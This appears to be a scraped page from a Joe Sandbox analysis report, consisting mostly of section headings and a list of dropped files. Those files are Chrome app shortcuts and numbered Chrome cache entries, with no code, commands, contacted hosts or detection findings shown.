Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 118

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 82

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Chrome Cache Entry: 87

Chrome Cache Entry: 88

Chrome Cache Entry: 89

Chrome Cache Entry: 90

Chrome Cache Entry: 91

Chrome Cache Entry: 92

Chrome Cache Entry: 93

Chrome Cache Entry: 94

Chrome Cache Entry: 95

Chrome Cache Entry: 97

Chrome Cache Entry: 99